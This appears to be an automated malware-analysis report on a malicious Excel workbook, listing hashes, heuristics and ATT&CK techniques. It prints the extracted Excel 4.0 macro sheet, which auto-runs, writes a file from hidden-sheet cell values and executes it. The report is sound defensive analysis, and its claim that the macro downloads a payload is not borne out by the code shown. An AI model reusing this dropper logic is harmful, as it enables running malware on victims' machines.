Office (OOXML) malware analysis — malicious · 58aac0554ae4fc28

MALICIOUS

Office (OOXML)

194.9 KB Created: 2021-09-13 09:41:09 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2021-10-24

MD5: 76e7e2f5e636a6e8e98ed52ee7922ef4 SHA-1: d42b35987ab7a0ba7650f2d1e408cca2464aa3ca SHA-256: 58aac0554ae4fc28e2476f77b635fa52ab18385ee47e86b087c4ec0d2ba7447f

190 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file contains Excel 4.0 macros, indicated by the 'OOXML_XLM_MACROSHEET' and 'OOXML_XLM_DANGEROUS_FN' heuristics. These macros utilize functions like FOPEN, FWRITE, FCLOSE, and EXEC to download and execute a second-stage payload. The presence of these dangerous functions and the Auto_Open defined name strongly suggest a malicious intent to execute arbitrary code.

Heuristics 5

Excel 4.0 macro sheet (1 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET

Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME

Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
Dangerous XLM formula APIs: FOPEN, FWRITE, FCLOSE, EXEC, HALT critical OOXML_XLM_DANGEROUS_FN

Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET

Excel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/spreadsheetml/2006/main In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_sheet_00.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 1469 bytes

Filename	Kind	Source	Size
`xlm_sheet_00.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet1.xml	1469 bytes
SHA-256: `4f2d05565c1757f2b3c24e1962526736edd09bf7466e2d0cbde1ed39c8980089`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><dimension ref="A2:B1217"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15"/><sheetData><row r="2" spans="2:2"/><row r="148" spans="1:1"><c r="A148" t="b"><f>FOPEN(GET.NOTE(Macro1!$B$2, 1, 200), 1+2)</f><v>0</v></c></row><row r="216" spans="1:1"><c r="A216" t="b"><f>FOR.CELL("DQKyxq",Sheet1!D169:AH977, TRUE)</f><v>0</v></c></row><row r="269" spans="1:1"><c r="A269" t="e"><f>FWRITE(Macro1!A148,CHAR(DQKyxq))</f><v>#NAME?</v></c></row><row r="381" spans="1:2"/><row r="382" spans="1:2"><c r="A382" t="b"><f>NEXT()</f><v>0</v></c></row><row r="446" spans="1:1"><c r="A446" t="b"><f>FCLOSE(Macro1!A148)</f><v>0</v></c></row><row r="1097" spans="1:1"><c r="A1097" t="b"><f>SET.VALUE(Macro1!$B$381, GET.NOTE(Macro1!$B$381, 1, 200))</f><v>0</v></c></row><row r="1169" spans="1:1"><c r="A1169" t="b"><f>EXEC(Macro1!$B$381)</f><v>0</v></c></row><row r="1217" spans="1:1"><c r="A1217" t="b"><f>HALT()</f><v>0</v></c></row></sheetData><sheetProtection password="8770" sheet="1" objects="1" scenarios="1"/><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><legacyDrawing r:id="rId1"/></xm:macrosheet>

SHA-256: 4f2d05565c1757f2b3c24e1962526736edd09bf7466e2d0cbde1ed39c8980089

Preview script

First 1,000 lines of the extracted script

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><dimension ref="A2:B1217"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15"/><sheetData><row r="2" spans="2:2"/><row r="148" spans="1:1"><c r="A148" t="b"><f>FOPEN(GET.NOTE(Macro1!$B$2, 1, 200), 1+2)</f><v>0</v></c></row><row r="216" spans="1:1"><c r="A216" t="b"><f>FOR.CELL("DQKyxq",Sheet1!D169:AH977, TRUE)</f><v>0</v></c></row><row r="269" spans="1:1"><c r="A269" t="e"><f>FWRITE(Macro1!A148,CHAR(DQKyxq))</f><v>#NAME?</v></c></row><row r="381" spans="1:2"/><row r="382" spans="1:2"><c r="A382" t="b"><f>NEXT()</f><v>0</v></c></row><row r="446" spans="1:1"><c r="A446" t="b"><f>FCLOSE(Macro1!A148)</f><v>0</v></c></row><row r="1097" spans="1:1"><c r="A1097" t="b"><f>SET.VALUE(Macro1!$B$381, GET.NOTE(Macro1!$B$381, 1, 200))</f><v>0</v></c></row><row r="1169" spans="1:1"><c r="A1169" t="b"><f>EXEC(Macro1!$B$381)</f><v>0</v></c></row><row r="1217" spans="1:1"><c r="A1217" t="b"><f>HALT()</f><v>0</v></c></row></sheetData><sheetProtection password="8770" sheet="1" objects="1" scenarios="1"/><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><legacyDrawing r:id="rId1"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.